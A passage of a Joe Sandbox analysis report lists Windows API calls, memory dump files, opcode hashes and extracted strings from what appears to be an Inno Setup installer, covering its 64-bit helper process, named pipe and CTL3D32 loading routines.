                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                                            • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 734332943-0
                                                                                                                            • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                            • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                                            • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                            • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1611563598-0
                                                                                                                            • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                            • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                                            • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                            • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                            • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                                            • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                            • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3375834691-0
                                                                                                                            • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                            • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                                            • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                            • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                            • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                                            • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                            • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                            • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                                            • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                            • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1452528299-0
                                                                                                                            • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                            • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                                            • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                            • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001004,00005007,00401973), ref: 00401766
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                            • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                                            • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                            • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                                            • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                            • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                            • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                            • API String ID: 2323315520-3614243559
                                                                                                                            • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                            • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                                            • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                            • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                                            • QueryPerformanceCounter.KERNEL32(021B3858,00000000,004588C2,?,?,021B3858,00000000,?,00458FBE,?,021B3858,00000000), ref: 00458638
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(021B3858,021B3858), ref: 00458642
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,021B3858,00000000,004588C2,?,?,021B3858,00000000,?,00458FBE,?,021B3858,00000000), ref: 0045864B
                                                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021B3858,021B3858), ref: 004586CF
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                                            • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                            • API String ID: 770386003-3271284199
                                                                                                                            • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                            • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                                            • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                            • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                              • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                              • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                              • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8), ref: 004783CC
                                                                                                                              • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                              • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021B2BF8,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                                            • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                                            • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                            • API String ID: 883996979-221126205
                                                                                                                            • Opcode ID: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                                            • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                                            • Opcode Fuzzy Hash: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                                            • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
